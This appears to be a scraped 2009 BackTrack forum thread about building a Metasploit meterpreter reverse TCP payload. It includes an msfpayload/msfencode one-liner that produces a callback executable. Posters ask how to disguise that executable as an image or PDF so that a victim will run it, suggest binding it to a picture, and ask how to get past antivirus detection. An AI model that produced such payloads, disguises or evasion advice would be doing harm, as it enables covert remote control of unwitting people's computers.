Metasploiting for BT3 - Reverse TCP

**samer** · 03-19-2009, 10:25 PM

yes A and B are in different subnet and A can't ping directly B (but A can ping the ISP of B and vise versa)

**phoenix910** · 03-20-2009, 02:17 AM

Originally Posted by samer

yes A and B are in different subnet and A can't ping directly B (but A can ping the ISP of B and vise versa)

Would have been easier to say that from the start, instead of "they're on the same network but they're not on the same network". If that's the case, and they can ping the WAN addresses, then just use them instead of the LAN addresses.

~phoenix910

**cody81** · 03-23-2009, 06:24 PM

Excellent work,

I have a question. Is it possible to create output.exe with a different format like "output.jpeg" or "output.gif" ? Because it will be easier to convince the person to run it...

Thanks

**cr1spyj0nes** · 03-24-2009, 06:11 AM

good question il give that a try.
as soon as i can find some "BLOODY CIGARETTES""

**phoenix910** · 03-24-2009, 09:32 AM

Originally Posted by cody81

Excellent work,

I have a question. Is it possible to create output.exe with a different format like "output.jpeg" or "output.gif" ? Because it will be easier to convince the person to run it...

Thanks

Not that I know of - they aren't executables. Mind you, I haven't tried it. I'd just try binding the exe with the picture if that's what you want to achieve.

~phoenix910

**cr1spyj0nes** · 03-24-2009, 11:14 AM

na didnt work

**cody81** · 03-25-2009, 07:12 PM

Originally Posted by phoenix910

Not that I know of - they aren't executables. Mind you, I haven't tried it. I'd just try binding the exe with the picture if that's what you want to achieve.

~phoenix910

Thanks for your response... However, that's not what i want to achieve exactly.

In a video(I am not allowed to post the URL of the video because of my post count. If you want i can send pm to you), he is doing the same think with a ".pdf" file to start up the multihandler to catch the callback. That's why i asked about jpeg. I also checked his website that's given in the video but i didn't understand exactly. By the way, do you know about creating it in pdf format?

**kazalku** · 03-25-2009, 10:17 PM

Originally Posted by cody81

Thanks for your response... However, that's not what i want to achieve exactly.

In a video(I am not allowed to post the URL of the video because of my post count. If you want i can send pm to you), he is doing the same think with a ".pdf" file to start up the multihandler to catch the callback. That's why i asked about jpeg. I also checked his website that's given in the video but i didn't understand exactly. By the way, do you know about creating it in pdf format?

is it this one:
http://www.ethicalhacker.net/content/view/219/24/

**phoenix910** · 03-26-2009, 10:39 AM

Never done it myself, but I assume that this is exploiting a PDF's ability to interpret scripting? Haven't looked at any links yet myself, but that's just off the top of my head.

~phoenix910

**kazalku** · 06-29-2009, 08:50 PM

Well, seems that the AV is getting smarter.
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=5555 R | ./msfencode -b '' -t exe -o output.exe

The above exe can no longer be used because of the AV warning. Any idea to overcome this?

BackTrack Linux - Penetration Testing Distribution

Thread: Metasploiting for BT3 - Reverse TCP

Thread Tools

Search Thread

Display

exe file is caught by Avast

Posting Permissions